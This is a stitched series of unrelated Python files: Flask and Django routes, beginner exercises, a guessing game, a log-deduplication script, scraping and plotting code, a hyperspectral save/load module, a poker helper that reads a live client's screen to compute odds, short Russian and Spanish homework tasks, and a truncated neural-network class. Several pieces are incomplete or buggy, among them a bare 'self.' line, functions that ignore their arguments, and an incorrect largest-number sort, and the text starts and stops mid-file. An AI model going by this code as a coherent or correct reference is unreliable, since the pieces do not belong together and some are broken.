# return render_template('sixteen.html')
#
#
# @app.route('/sixteen.png')
# def sixteen_plot():
# graph_16 = queries.get_query16()
# return send_file(graph_16, mimetype='image/png', cache_timeout=0)
@app.route('/seventeen.html')
def seventeen():
return render_template('seventeen.html')
@app.route('/seventeen.png')
def seventeen_plot():
graph_17 = queries.get_query17()
return send_file(graph_17, mimetype='image/png', cache_timeout=0)
if __name__ == '__main__':
app.run()
|
import random
on_off = True
correct_guesses = 0
incorrect_guesses = 0
while on_off:
print("Which guessing game do you want to play? (Coin Flip or Dice Roll)")
game = str(input())
if game == "Coin Flip":
guess = ""
while guess != "Heads" and guess != "Tails":
print("Type your guess, Heads or Tails")
guess = str(input())
if guess != "Heads" and guess != "Tails":
print("Please type either 'Heads' or 'Tails'")
if guess == "Heads":
print("Your Guess: Heads")
else:
print("Your Guess: Tails")
answer = ""
random_number = random.randint(1, 2)
if random_number == 1:
answer = "Heads"
elif random_number == 2:
answer = "Tails"
print("Answer: " + answer)
if guess == answer:
correct_guesses += 1
print("Your guess was corret!")
else:
incorrect_guesses += 1
print("Sorry, your guess was incorrect.")
total_guesses = correct_guesses + incorrect_guesses
print("Total Guesses: " + str(total_guesses))
print("Total Correct Guesses: " + str(correct_guesses))
continue_answer = ""
while continue_answer != "yes" and continue_answer != "no":
print("Do you want to continue? (yes or no)")
continue_answer = str(input())
if continue_answer != "yes" and continue_answer != "no":
print("Please type either 'yes' or 'no'")
if continue_answer == "no":
on_off = False
elif game == "Dice Roll":
guess = ""
while guess != "1" and guess != "2" and guess != "3" and guess != "4" and guess != "5" and guess != "6":
print("Type your guess, 1-6")
guess = str(input())
if guess != "1" and guess != "2" and guess != "3" and guess != "4" and guess != "5" and guess != "6":
print("Please type either 1, 2, 3, 4, 5 or 6")
print("Your Guess: " + guess)
answer = str(random.randint(1, 6))
print("Answer: " + answer)
if guess == answer:
correct_guesses += 1
print("Your guess was corret!")
else:
incorrect_guesses += 1
print("Sorry, your guess was incorrect.")
total_guesses = correct_guesses + incorrect_guesses
print("Total Guesses: " + str(total_guesses))
print("Total Correct Guesses: " + str(correct_guesses))
continue_answer = ""
while continue_answer != "yes" and continue_answer != "no":
print("Do you want to continue? (yes or no)")
continue_answer = str(input())
if continue_answer != "yes" and continue_answer != "no":
print("Please type either 'yes' or 'no'")
if continue_answer == "no":
on_off = False
else:
print("Please type either 'Coin Flip' or 'Dice Roll'") |
def sum_with_for(numbers):
sum = 0
for num in numbers:
sum += num
return sum
def sum_with_while(numbers):
sum = 0
i = 0
while i < len(numbers):
sum += numbers[i]
i += 1
return sum
def sum_with_recursion(numbers):
# if base case=> numbers is empty
if len(numbers) == 0:
# return 0
return 0
# if there are still numbers in list
return numbers[0] + sum_with_recursion(numbers[1:])
# return numbers.head + sum_with_recursion(numbers[1:max])
def combine_alternate(list_a, list_b):
# Write a function that combines two lists by
# alternatingly taking elements.
# For example: given the two lists [a, b, c] and [1, 2, 3],
# the function should return [a, 1, b, 2, c, 3].
i = 0
list_c = []
while i < len(list_a):
list_c.append(list_a[i])
list_c.append(list_b[i])
i += 1
print(list_c)
def first_x_fibonacci(x=10):
a = 0
b = 1
fibonacci_list = [a, b]
while(len(fibonacci_list) != 10):
c = a + b
fibonacci_list.append(c)
a = b
b = c
print(fibonacci_list)
def largest_number(input_list):
# Write a function that given a list of non negative integers,
# arranges them such that they form the largest possible number.
# For example, given [50, 2, 1, 9], the largest formed number is 95021.
# [50, 2, 1, 9]
sort_for_largest = [str(x) for x in input_list]
sort_for_largest.sort(reverse=True)
largest = int(''.join(sort_for_largest))
print(largest)
def sum_of_100():
# Write a program that outputs all possibilities to put
# + or - or nothing between the numbers 1, 2, ..., 9 (in this order)
# such that the result is always 100.
# For example: 1 + 2 + 34 – 5 + 67 – 8 + 9 = 100.
pass
def main():
numbers = [1,2,3,4,5,6]
# Problem 1
# print(sum_with_for(numbers))
print(sum_with_while(numbers))
print(sum_with_recursion(numbers))
# Problem 2
# combine_alternate(['a', 'b', 'c'], [1,2,3])
# Problem 3
# first_x_fibonacci()
# Problem 4
# largest_number([50, 2, 1, 9])
if __name__ == '__main__':
main() |
from app import app, db
from flask import render_template, redirect, url_for, flash, request
from app.forms import LoginForm, RegisterForm, PostForm
from flask_login import current_user, login_user, logout_user, login_required
from app.models import User, Post
from werkzeug.urls import url_parse
@app.route('/', methods=['GET','POST'])
@app.route('/index', methods=['GET','POST'])
def index():
user = {'username': 'Daniel'}
num = 2+2
return render_template('index.html', user=user,num=num,title='Home Page')
@app.route('/posts', methods=['GET','POST'])
@login_required
def posts():
form = PostForm()
if form.validate_on_submit():
post = Post(body=form.username.data, author=current_user)
db.session.add(post)
db.session.commit()
flash('Congratulations, on the new post!')
return redirect(url_for('posts'))
if current_user.is_authenticated:
posts = current_user.posts
else:
posts=[]
return render_template('posts.html',title='Posts',posts=posts,form=form)
# @app.route('/redirect')
# def goaway():
# return redirect(url_for('index'))
@app.route('/login', methods=['GET','POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
login_form = LoginForm()
if login_form.validate_on_submit():
user = User.query.filter_by(username=login_form.username.data).first()
if user is None or not user.check_password(login_form.password.data):
flash('Invalid login credentials')
return redirect(url_for('login'))
login_user(user, remember=login_form.remember_me.data)
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
next_page = url_for('index')
flash('Thanks for loggin in {}!'.format(current_user.username))
return redirect(next_page)
return render_template('login.html',form=login_form)
@app.route('/register', methods=['GET','POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
register_form = RegisterForm()
if register_form.validate_on_submit():
user = User(username=register_form.username.data, \
email=register_form.email.data)
user.set_password(register_form.password.data)
db.session.add(user)
db.session.commit()
flash('Congratulations, you are now registered!')
return redirect(url_for('login'))
return render_template('register.html',form=register_form)
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
|
#!/usr/bin/env python
from __future__ import print_function
import subprocess, os, time, sys
short_name = 'Opt 2'
disp_name = 'Database Stats'
otype = 'Routine'
need = ['Where is the location of your Old Database file: ', \
'Where is the location of your New Database file: ']
answers = []
dups = {}
hits=0
def run():
global answers, dups, hits
hits=0
answers=[]
dups={}
while True:
os.system('cls')
answers=['','']
i = 0
while i < len(need):
ans = raw_input(need[i])
if validate(ans):
answers.append(ans)
i += 1
answers[0] = (answers[0])[1:-1]
answers[1] = (answers[1])[1:-1]
wait_timer('\nSearching your log files..')
with open(answers[0], 'r') as log_file:
with open(answers[1], 'r') as second_log:
for _ in range(2): next(log_file)
for line in log_file:
#if line.startswith('Time') or line.startswith('Combined'):
# pass
#else:
line_split = line.split(',')
if not line_split[3] in dups:
if (line_split[3] != ''):
dups.update({str(line_split[3]):1})
else: dups[line_split[3]] +=1
if not line_split[6] in dups:
if line_split[6] != '':
dups.update({str(line_split[6]):1})
else: dups[line_split[6]] +=1
for _ in range(2): next(second_log)
for line in second_log:
if line.startswith('Time') or line.startswith('Combined'):
pass
else:
line_split = line.split(',')
if not line_split[3] in dups:
if (line_split[3] != ''):
dups.update({str(line_split[3]):1})
else: dups[line_split[3]] +=1
if not line_split[6] in dups:
if line_split[6] != '':
dups.update({str(line_split[6]):1})
else: dups[line_split[6]] +=1
# Where I tried to cut out dups that were equal to 1
# del_one=''
# for w in sorted(dups, key=dups.__getitem__):
# if not del_one == '':
# del dups[del_one]
# del_one=''
# if dups[w]==1:
# del_one=str(w)
output_to_file()
raw_input('\n\nSearch finished with '+str(hits)+ \
' results found. Please press enter to return.')
return
def output_to_file():
global hits
now = time.strftime("%d%b%Y-%H%M")
path = os.getcwd()
save_file = path+"\\Search_Results\\Database_Sumary_on_"+str(now)+'.txt'
sys.stdout.write('\nWriting search hits to file...')
with open(answers[0], 'r') as first_file:
with open(answers[1], 'r') as second_file:
with open(save_file, 'w') as output:
output.write('Summary of search hits...\n')
for z in sorted(dups, key=dups.__getitem__, reverse=True):
if dups[z] > 1: output.write(str(z)+': '+str(dups[z])+'\n')
output.write('\n\nHere are the search results...\n')
for z in sorted(dups, key=dups.__getitem__, reverse=True):
found_lines=[]
sesh=''
if dups[z] > 1:
first_file.seek(0)
for _ in range(2): next(first_file)
for line in first_file:
line1_split=line.split(',')
if str(z) in line:
if not sesh == line1_split[1]:
sesh=line1_split[1]
found_lines.append(line)
second_file.seek(0)
for _ in range(2): next(second_file)
for line2 in second_file:
line2_split=line2.split(',')
if str(z) in line2:
if not sesh == line2_split[1]:
sesh=line2_split[1]
found_lines.append(line2)
output.write('\nFound '+str(z)+' with '+str(dups[z])+' hits.\n')
for k in found_lines:
output.write(k)
sys.stdout.write('.')
hits +=1
def validate(char):
if char:
return True
return False
# this sections prints a wait timer
def wait_timer(what):
sys.stdout.write(what+'..')
i = 4
while i > 0:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(.25)
i -= 1
|
import random
L1 = random.choices(list(range(11, 30)), k = 10)
L2 = random.choices(list(range(11, 30)), k = 10)
print(L1)
print(L2)
# i
print(set(L1).intersection(set(L2)))
# ii
print(set(L1))
print(set(L2))
# iii
print(min(L1))
print(min(L2))
# iv
print(max(L1))
print(max(L2))
# v
print(sum(L1))
print(sum(L2)) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 4 23:20:45 2019
@author: allen
"""
# get the target url
import urllib.request as urlrequest
from bs4 import BeautifulSoup
actual_data_url = 'http://py4e-data.dr-chuck.net/known_by_Fikret.html'
page = urlrequest.urlopen(actual_data_url)
soup = BeautifulSoup(page, 'html.parser')
#get info
counts = dict()
tags = soup('a')
print(tags[6].get_text())
for tag in tags:
counts[tag.get_text()] = counts.get(tag.get_text(), 0) + 1
print(counts) |
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as Axes3D
class GUI():
def __init__(self):
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111, projection='3d')
self.ax.set_xlim3d([-2.0, 2.0])
self.ax.set_xlabel('X')
self.ax.set_ylim3d([-2.0, 2.0])
self.ax.set_ylabel('Y')
self.ax.set_zlim3d([0, 5.0])
self.ax.set_zlabel('Z')
self.ax.set_title('Quadcopter Simulation')
self.
def init_plot(self):
self.ax.plot([],[],[],color='blue',linewidth=3)
|
# import the necessary packages
import logging
import os
import shutil
from datetime import datetime
import cv2
import numpy as np
from PIL import Image
import time
from threading import Event
from card_classifier import CardClassifier
from card_util import get_game_area_as_2d_array, \
init_logger, clip_and_save, timeit, trim_main_window_image_array, \
rgb_yx_array_to_grayscale, find_contours, display_image_with_contours
from configuration import Config as cfg
from number_reader import NumberReader
import sys
from scipy.special import comb
logger = logging.getLogger(__name__)
trace_logger = logging.getLogger(__name__ + "_trace")
def get_out_odds(len_common_cards, n_outs, n_chances):
cards_left = 52.0 - len_common_cards - 2
denom = comb(N=cards_left, k=n_chances, exact=False, repetition=False)
num = comb(N=n_outs, k=n_chances, exact=False, repetition=False)
if n_chances == 2:
num += n_outs * (cards_left - n_outs)
return 100.0 * (num / denom)
def perc_to_odds_to_1(perc):
left = 100 - perc
right = left / perc
return right
class GameInfo(object):
def __init__(self):
self.common_cards = []
self.hole_cards = []
self.pot_starting = None
self.to_call = None
self.pot = None
self.chips_remaining = None
def pot_odds(self):
if self.pot is None or self.to_call is None or self.to_call <= 0:
return -2
return self.pot / self.to_call
def is_equal(self, other_gi):
if other_gi is None:
return False
for atts in ['pot_starting', 'to_call', 'pot']:
if getattr(self, atts) != getattr(other_gi, atts):
return False
if not np.array_equal(self.common_cards, other_gi.common_cards):
return False
if not np.array_equal(self.hole_cards, other_gi.hole_cards):
return False
return True
@timeit
def get_hole_cards(game_area_image_array, card_classifier, game_info):
image_array = cfg.HERO_PLAYER_HOLE_CARDS_LOC.clip_2d_array(game_area_image_array)
#display_image_with_contours(image_array, [])
grey_array = rgb_yx_array_to_grayscale(image_array)
game_info.hole_cards = card_classifier.evaluate_hole_card_image_array(grey_array)
logger.info("Found hole card {} and {}".format(
card_classifier.get_card_string(game_info.hole_cards[0]),
card_classifier.get_card_string(game_info.hole_cards[1])
))
@timeit
def find_common_cards(screenshot_rgb_yx_array, card_classifier, gi):
#image = cv2.imread(screenshot_file_path)
#image = cv2.cvtColor(screenshot_rgb_yx_array, cv2.COLOR_RGB2BGR)
bw = rgb_yx_array_to_grayscale(screenshot_rgb_yx_array[125:190, 240:550])
# NOTE: its img[y: y + h, x: x + w] and *not* img[x: x + w, y: y + h]
if False:
cv2.imshow('image', bw)
cv2.waitKey(0)
cv2.destroyAllWindows()
# display_cv2_image_with_contours(image, [])
#bw = get_black_and_white_image(image)
#cnts = find_contours_with_cv(bw)
cnts = find_contours(bw, min_width= cfg.CARD_WIDTH_PIXELS - 5,
max_width=cfg.CARD_WIDTH_PIXELS + 15,
min_height=cfg.CARD_HEIGHT_PIXELS - 15,
max_height=cfg.CARD_HEIGHT_PIXELS + 15,
display=False)
contours_list = list(cnts)
#display_image_with_contours(bw, [c.points_array for c in contours_list])
image_array = bw
# loop over the contours individually
for idx, contour in enumerate(contours_list):
y = contour.bounding_box
crop_img = contour.bounding_box.clip_2d_array(image_array)
#card_image = Image.fromarray(crop_img)
c = card_classifier.evaluate_card(crop_img)
logger.info(f"Classified extracted image #{idx} as {card_classifier.get_card_string(c)}")
if c is not None:
gi.common_cards.append(c)
@timeit
def extract_game_info_from_screenshot(screenshot_image_rgb_yx_array, card_classifier, number_reader=None):
logger.info(f"Starting catpure of {screenshot_image_rgb_yx_array.shape}")
gi = GameInfo()
game_area_image_array = trim_main_window_image_array(screenshot_image_rgb_yx_array)
if number_reader is not None:
bets = number_reader.get_bets(game_area_image_array.copy())
gi.to_call = 0
gi.chips_remaining = number_reader.get_hero_chips_remaining(game_area_image_array.copy())
if len(bets) > 0 and gi.chips_remaining is not None:
gi.to_call = min(np.max(bets[1:]), gi.chips_remaining + bets[0]) - bets[0]
gi.pot_starting = number_reader.get_starting_pot(game_area_image_array.copy())
if gi.chips_remaining is not None:
gi.pot = gi.pot_starting + np.sum([min(gi.chips_remaining + bets[0], b) for b in bets])
logger.info(f"Starting Pot: {gi.pot_starting}\nTotal Pot: {gi.pot}\nTo Call: {gi.to_call}")
get_hole_cards(game_area_image_array=game_area_image_array,
card_classifier=card_classifier,
game_info=gi)
find_common_cards(screenshot_rgb_yx_array=game_area_image_array,
card_classifier=card_classifier, gi=gi)
# display_cv2_image_with_contours(bw, cnts)
return gi
event_exit = Event()
@timeit
def get_poker_image_rgb_yx_array():
import poker
return poker.take_screenshot()
def main():
import poker
init_logger()
card_classifier = CardClassifier()
number_reader = NumberReader()
try:
os.makedirs(cfg.SCREENSHOTS_PATH, exist_ok=True)
shutil.rmtree(cfg.EXTRACTED_IMAGES_PATH, ignore_errors=True)
os.makedirs(cfg.EXTRACTED_IMAGES_PATH, exist_ok=True)
except Exception as ex:
print(ex)
now = datetime.now()
formatted_time = now.strftime("%Y_%m_%d__%H_%M_%S_%f")
# file_path = os.path.join(cfg.UNIT_TEST_DATA_DIR, 'bet7.png')
file_path = None
# if file_path is None:
iterations = 60 * 60
last_gi = None
for i in range(0, iterations):
#file_path = os.path.join(cfg.SCREENSHOTS_PATH, 'screenshot_{}.png'.format(formatted_time))
#capture_screenshot("chrome", output_file_path=file_path)
chrome_image_rgb_array = get_poker_image_rgb_yx_array()
gi = extract_game_info_from_screenshot(chrome_image_rgb_array, card_classifier, number_reader)
if gi.is_equal(last_gi):
continue
print("*" * 80)
print(" " * 80)
for c in gi.common_cards:
print(f"Common card: {card_classifier.get_card_string(c)}")
for h in gi.hole_cards:
print(f"Hole card: {card_classifier.get_card_string(h)}")
if gi.chips_remaining is not None:
print("Chips remaining: {:,}".format(gi.chips_remaining))
print("Starting Pot: {:,}".format(gi.pot_starting))
if gi.pot is not None:
print("Pot: {:,}".format(gi.pot))
print("To Call: {:,}".format(gi.to_call))
for outs in [9, 8, 4, 2]:
perc = get_out_odds(len_common_cards=len(gi.common_cards), n_outs=outs, n_chances=1)
ratio = perc_to_odds_to_1(perc)
print(f"{outs} outs. {perc:.2f}% = {ratio:.2f}:1")
if len(gi.common_cards) == 3:
perc = get_out_odds(len_common_cards=len(gi.common_cards), n_outs=outs, n_chances=2)
ratio = perc_to_odds_to_1(perc)
print(f"{outs} outs. 2 cards to go {perc:.2f}% = {ratio:.2f}:1")
print(f"\nPot odds: { 100.0/(1+gi.pot_odds()):.2f}% = {gi.pot_odds():.2f}:1 ")
if len(gi.hole_cards) == 2 and gi.hole_cards[0] is not None:
hole_card_string = "".join([card_classifier.get_card_short_string(hc) for hc in gi.hole_cards])
common_cards_string = "".join([card_classifier.get_card_short_string(cc) for cc in gi.common_cards])
equity3 = poker.run_simulation(3, hole_card_string, common_cards_string, 500000, False)
equity4 = poker.run_simulation(4, hole_card_string, common_cards_string, 500000, False)
equity5 = poker.run_simulation(5, hole_card_string, common_cards_string, 500000, False)
print(f"Equity:\n3 players: {equity3:.2f}%\n4 players: {equity4:.2f}%\n5 players: {equity5:.2f}% ")
last_gi = gi
def quit(signo, _frame):
print("Interrupted by %d, shutting down" % signo)
event_exit.set()
if __name__ == '__main__':
import signal
# signal.signal(signal.CTRL_C_EVENT, quit)
# signal.signal(signal.CTRL_BREAK_EVENT, quit)
signal.signal(signal.SIGINT, quit)
signal.signal(signal.SIGBREAK, quit)
try:
main()
except KeyboardInterrupt:
pass
|
"""
Import and export hyperspectral data. For hyperspectral images this is mostly done using GDAL,
while for point clouds and hyperspectral libraries a variety of different methods are included.
"""
from .headers import *
from .images import *
from .clouds import *
from .libraries import *
from .pmaps import *
from .cameras import saveCameraTXT, loadCameraTXT
from hylite import HyImage, HyCloud, HyLibrary, HyCollection, HyScene
from hylite.project import PMap, Camera, Pushbroom
import shutil
def save(path, data, **kwds):
"""
A generic function for saving HyData instances such as HyImage, HyLibrary and HyCloud. The appropriate file format
will be chosen automatically.
*Arguments*:
- path = the path to save the file too.
- data = the data to save. This must be an instance of HyImage, HyLibrary or HyCloud.
*Keywords*:
- vmin = the data value that = 0 when saving RGB images.
- vmax = the data value that = 255 when saving RGB images. Must be > vmin.
"""
if isinstance(data, HyImage):
# special case - save ternary image to png or jpg or bmp
ext = os.path.splitext(path)[1].lower()
if 'jpg' in ext or 'bmp' in ext or 'png' in ext or 'pdf' in ext:
if data.band_count() == 1 or data.band_count() == 3 or data.band_count == 4:
from matplotlib.pyplot import imsave
rgb = np.transpose( data.data, (1,0,2) )
if not ((data.is_int() and np.max(rgb) <= 255)): # handle normalisation
rgb = rgb - kwds.get("vmin", 0)
rgb /= (kwds.get("vmax", np.max(rgb) ) - kwds.get("vmin", 0) )
rgb = (np.clip(rgb, 0, 1) * 255).astype(np.uint8) # convert to 8 bit image
imsave( path, rgb ) # save the image
return
else: # save hyperspectral image
try:
from osgeo import gdal # is gdal installed?
save_func = saveWithGDAL
except ModuleNotFoundError: # no gdal, use SPy
save_func = saveWithSPy
ext = 'dat'
elif isinstance(data, HyHeader):
save_func = saveHeader
ext = 'hdr'
elif isinstance(data, HyCloud):
save_func = saveCloudPLY
ext = 'ply'
elif isinstance(data, HyLibrary):
save_func = saveLibraryCSV
ext = 'csv'
elif isinstance(data, PMap ):
save_func = savePMap
ext = 'npz'
elif isinstance(data, Camera ):
save_func = saveCameraTXT
ext = 'cam'
elif isinstance(data, Pushbroom):
save_func = saveCameraTXT
ext = 'brm'
elif isinstance(data, HyCollection):
save_func = saveCollection
ext = 'hyc'
if isinstance(data, HyScene): # special type of HyCollection, should have different extension
ext = 'hys'
if os.path.splitext(path)[0]+"."+ext != data._getDirectory(): # we're moving to a new home! Copy folder
if os.path.exists(data._getDirectory()): # if it exists...
shutil.copytree( data._getDirectory(), os.path.splitext(path)[0]+"."+ext)
elif isinstance(data, np.ndarray):
save_func = np.save
ext = 'npy'
else:
assert False, "Error - data type %s is unsupported by hylite.io.save." % type(data)
# check path file extension
if 'hdr' in os.path.splitext(path)[1]: # auto strip .hdr extensions if provided
path = os.path.splitext(path)[0]
if ext not in os.path.splitext(path)[1]: # add type-specific extension if needed
path += '.%s'%ext
# save!
save_func( path, data )
def load(path):
"""
A generic function for loading hyperspectral images, point clouds and libraries. The appropriate load function
will be chosen based on the file extension.
*Arguments*:
- path = the path of the file to load.
*Returns*:
- a HyData instance containing the loaded dataset.
"""
assert os.path.exists( path ), "Error: file %s does not exist." % path
# load file formats with no associated header
if 'npz' in os.path.splitext( path )[1].lower():
return loadPMap(path)
elif 'npy' in os.path.splitext( path )[1].lower():
return np.load( path ) # load numpy
# file (should/could) have header - look for it
header, data = matchHeader( path )
assert os.path.exists(data), "Error - file %s does not exist." % data
ext = os.path.splitext(data)[1].lower()
if ext == '':
assert os.path.isfile(data), "Error - %s is a directory not a file." % data
if 'ply' in ext: # point or hypercloud
return loadCloudPLY(path)
elif 'las' in ext: # point or hypercloud
return loadCloudLAS(path)
elif 'csv' in ext: # spectral library
return loadLibraryCSV(path)
elif 'sed' in ext: # spectral library
return loadLibrarySED(path)
elif 'tsg' in ext: # spectral library
return loadLibraryTSG(path)
elif 'hyc' in ext or 'hys' in ext: # load hylite collection or hyscene
return loadCollection(path)
elif 'cam' in ext or 'brm' in ext: # load pushbroom and normal cameras
return loadCameraTXT(path)
else: # image
# load conventional images with PIL
if 'png' in ext or 'jpg' in ext or 'bmp' in ext:
# load image with matplotlib
from matplotlib.pyplot import imread
return HyImage(np.transpose(imread(path), (1, 0, 2)))
try:
from osgeo import gdal # is gdal installed?
return loadWithGDAL(path)
except ModuleNotFoundError: # no gdal, use SPy
return loadWithSPy(path)
##############################################
## save and load data collections
##############################################
# save collection
def saveCollection(path, collection):
# generate file paths
dirmap = collection.get_file_dictionary(root=os.path.dirname(path),
name=os.path.splitext(os.path.basename(path))[0])
# save files
for p, o in dirmap.items():
os.makedirs(os.path.dirname(p), exist_ok=True)
save(p, o) # save each path and item [ n.b. this includes the header file! :-) ]
def loadCollection(path):
# load header and find directory path
header, directory = matchHeader(path)
# parse name and root
root = os.path.dirname(directory)
name = os.path.basename(os.path.splitext(directory)[0])
if 'hyc' in os.path.splitext(directory)[1]:
C = HyCollection(name, root, header=loadHeader(header))
elif 'hys' in os.path.splitext(directory)[1]:
C = HyScene(name, root, header=loadHeader(header))
else:
print(header, directory )
assert False, "Error - %s is an invalid collection." % directory
return C |
from django.urls import path
from .views import get_a_routes_closest_stop_and_arrival_time, show_me_the_request
urlpatterns=[
path('v1/<lat>/<lon>/<bus_route>', get_a_routes_closest_stop_and_arrival_time, name='bus_data'),
path('v1/<lat>/<lon>', show_me_the_request.as_view(), name='print')
]
|
import numpy as np
import networkx as nx
from itertools import product
# Global variables
DEPOT, SUPPLY, DELIVERY = "Depot", "S", "D"
BLUE, GREEN, RED, BLACK = "blue", "green", "red", "black"
def get_label(instance, i: int):
"""
Returns the label of a specified index of a model
:param instance: instance object
:param i:
:return:
"""
if i == 0:
return DEPOT
if 0 < i <= instance.model_input.num_scooters:
return SUPPLY
else:
return DELIVERY
def create_node_dict(instance):
output = {}
locations = (
[instance.depot]
+ list(zip(instance.scooters["lat"], instance.scooters["lon"]))
+ list(zip(instance.delivery_nodes["lat"], instance.delivery_nodes["lon"]))
)
for i, index in enumerate(locations):
output[index] = {"label": get_label(instance, i)}
return output
def make_graph(nodes: dict, bound):
"""
Creates a networkx graph of the input nodes. Adds label to the nodes
:param nodes: dictionary of nodes [lat, lon]: "label"
:return: networkx graph, list of node labels, list of nodes border color, list of nodes color
"""
# Converts geographical coordinates to cartesian with lim [0,1] for visualization reasons
nodes = convert_geographic_to_cart(nodes, bound)
# make graph object
graph = nx.DiGraph()
graph.add_nodes_from([i for i in range(len(nodes.keys()))])
# set node label and position in graph
labels = {}
node_color = []
node_border = []
for i, p in enumerate(nodes.keys()):
label = nodes[p]["label"]
if label == DEPOT:
labels[i] = DELIVERY
node_color.append(BLUE)
node_border.append(BLACK)
elif label == SUPPLY:
labels[i] = i
node_color.append(GREEN)
node_border.append(BLACK)
elif label == DELIVERY:
labels[i] = i
node_color.append(RED)
node_border.append(BLACK)
graph.nodes[i]["pos"] = p
return graph, labels, node_border, node_color
def add_vehicle_node_info(instance, ax):
"""
Function to add information about vehicles for the first plot
:param instance: Instance object for a given solution
:param ax: Subplot to plot the information
:return: Colors corresponding to vehicles used to color edges
"""
# generate random colors for vehicle routs
np.random.seed(10)
colors = [
"#%06X" % np.random.randint(0, 0xFFFFFF)
for i in range(instance.model_input.num_service_vehicles)
]
(
num_of_service_vehicles,
service_vehicles_scooter_cap,
service_vehicles_battery_cap,
) = instance.service_vehicles
# adding vehicle color description
for i in range(len(colors)):
s = f"Vehicle {(i + 1)}"
ax.text(
0,
1 - 0.03 * i,
s,
transform=ax.transAxes,
c=colors[i],
fontsize=10,
weight="bold",
horizontalalignment="left",
verticalalignment="top",
)
# vehicle info box
cons = (
f"Vehicle constraint:\nTime = %d h %d m \n\nCar capacity:\nBattery = %d \nScooters = %d"
% (
int(instance.model.get_parameters().shift_duration / 60),
instance.model.get_parameters().shift_duration % 60,
service_vehicles_battery_cap,
service_vehicles_scooter_cap,
)
)
props = dict(boxstyle="round", facecolor="wheat", pad=0.5, alpha=0.5)
# place a text box in upper left in axes coords
ax.text(
0,
1 - 0.03 * (len(colors) + 1),
cons,
transform=ax.transAxes,
fontsize=10,
horizontalalignment="left",
verticalalignment="top",
bbox=props,
)
return colors
def display_edge_plot(instance, ax, s_edge_labels={}):
"""
Function to display second plot of edges not included in solution
:param instance: Instance object for a given solution
:param s_edge_labels: Dictionary of edges used in solution, default empty for infeasible solutions
:param ax: Subplot
"""
ax.axis("off")
# draw nodes
node_dict = create_node_dict(instance)
graph, labels, node_border, node_color = make_graph(node_dict, instance.bound)
edge_labels = {}
# check to handle infeasible models
if instance.is_feasible():
# draw edges and set label (time cost and inventory)
for x in instance.model.x:
from_node, to_node, vehicle_id = x
if instance.model.x[x].x == 0:
if (
from_node != to_node
and not s_edge_labels.keys().__contains__((from_node, to_node))
and not s_edge_labels.keys().__contains__((to_node, from_node))
):
graph.add_edge(from_node, to_node, color="grey", width=1, alpha=0.2)
edge_labels[(from_node, to_node)] = "t = " + str(
round(
instance.model.get_parameters().time_cost[
(from_node, to_node)
],
2,
)
)
else:
for x in instance.model.x:
from_node, to_node, vehicle_id = x
if (
vehicle_id == 0
and instance.model.get_parameters().time_cost[(from_node, to_node)] > 0
):
graph.add_edge(from_node, to_node, color="grey", width=1, alpha=0.2)
edge_labels[(from_node, to_node)] = "t = " + str(
round(
instance.model.get_parameters().time_cost[(from_node, to_node)],
2,
)
)
edges = graph.edges()
e_colors = [graph[u][v]["color"] for u, v in edges]
e_weights = [graph[u][v]["width"] for u, v in edges]
pos = nx.get_node_attributes(graph, "pos")
# draw graph
edges = nx.draw_networkx_edges(
graph, pos, edge_color=e_colors, width=e_weights, node_size=1, ax=ax,
)
nx.draw_networkx_labels(graph, pos, labels, font_size=1, font_color="w", ax=ax)
nx.draw_networkx_edge_labels(graph, pos, edge_labels=edge_labels, ax=ax)
for e in edges:
e.set_linestyle("dashed")
def convert_geographic_to_cart(nodes, bound):
"""
Function to convert geographical coordinates to cartesian
:param nodes: Dictionary of nodes [lat,lon]: type
:return: Dictionary of nodes [cart_x, cart_y]: type
"""
lat_min, lat_max, lon_min, lon_max = bound
delta_lat = lat_max - lat_min
delta_lon = lon_max - lon_min
zero_lat = lat_min / delta_lat
zero_lon = lon_min / delta_lon
output = {}
for i, j in nodes.keys():
key = ((j / delta_lon - zero_lon), (i / delta_lat - zero_lat))
output[key] = nodes[(i, j)]
return output
def add_zones(number_of_zones, ax):
"""
Function to add zones to solution plot
:param number_of_zones: int - number of per axis
:param ax: subplot
"""
axis_interval = float(1 / number_of_zones)
xy = list(
product(
np.arange(axis_interval, 1, axis_interval),
np.arange(axis_interval, 1, axis_interval),
)
)
for x, y in xy:
ax.axhline(x, xmax=0.93, color="black")
ax.axvline(y, ymax=0.98, color="black")
|
'''
Task 0.
Систему работы с багажом для аэропорта.
Багаж можно поместить в самолет если:
Его ширина < 90 см;
Его высота < 80 см;
Его глубина < 40 см;
ИЛИ
Ширина + высота + глубина < 160.
'''
w = float(input('Введите ширину багажа: '))
h = float(input('Введите высоту багажа: '))
d = float(input('Введите глубину багажа: '))
if (w > 0 and h > 0 and d > 0) and ((w <= 90 and h <= 80 and d <= 40) or (w + h + d <= 160)):
print('Багаж можно поместить в самолет!')
else:
print('Багаж нельзя поместить в самолет!') |
from consultar_notas import *
from utils import *
from criar_conteudos import * |
# En 1994 el pais A tiene una poblacion de 25 millones de habitantes
# y el pais B de 19.9 millones. las tasas de crecimiento son de 2% y 3%
# respectivamente. Desarrollar un algoritmo para informar en que año la
# poblacion del pais B supera la del pais A.
country_A = 25
country_B = 19.9
year = 1994
while country_B < country_A :
country_A = country_A * 0.02 + country_A
country_B = country_B * 0.03 + country_B
year += 1
print(f'Poblacion de pais 1 {country_A }')
print(f'Poblacion de pais 2 {country_B}')
print(f'año {year}')
|
from lasagne.layers.input import InputLayer
from lasagne.layers.special import NonlinearityLayer
from lasagne.layers.shape import DimshuffleLayer, SliceLayer, FlattenLayer
from lasagne.layers.dnn import Pool3DDNNLayer
from lasagne.nonlinearities import sigmoid
import lasagne
import theano.tensor as T
from braindecode.veganlasagne.nonlinearities import safe_log
from braindecode.veganlasagne.recurrent import BandpassLayer
from braindecode.veganlasagne.tensor_dot import TensorDotLayer
class BandpassSquareClassify(object):
def __init__(self, n_examples, n_time_steps, n_chans,
n_filters, n_filt_order, truncate_gradient,
n_pool_len=200, n_spat_filters=20):
self.__dict__.update(locals())
del self.self
def get_layers(self):
in_l = InputLayer((self.n_examples, self.n_time_steps, self.n_chans))
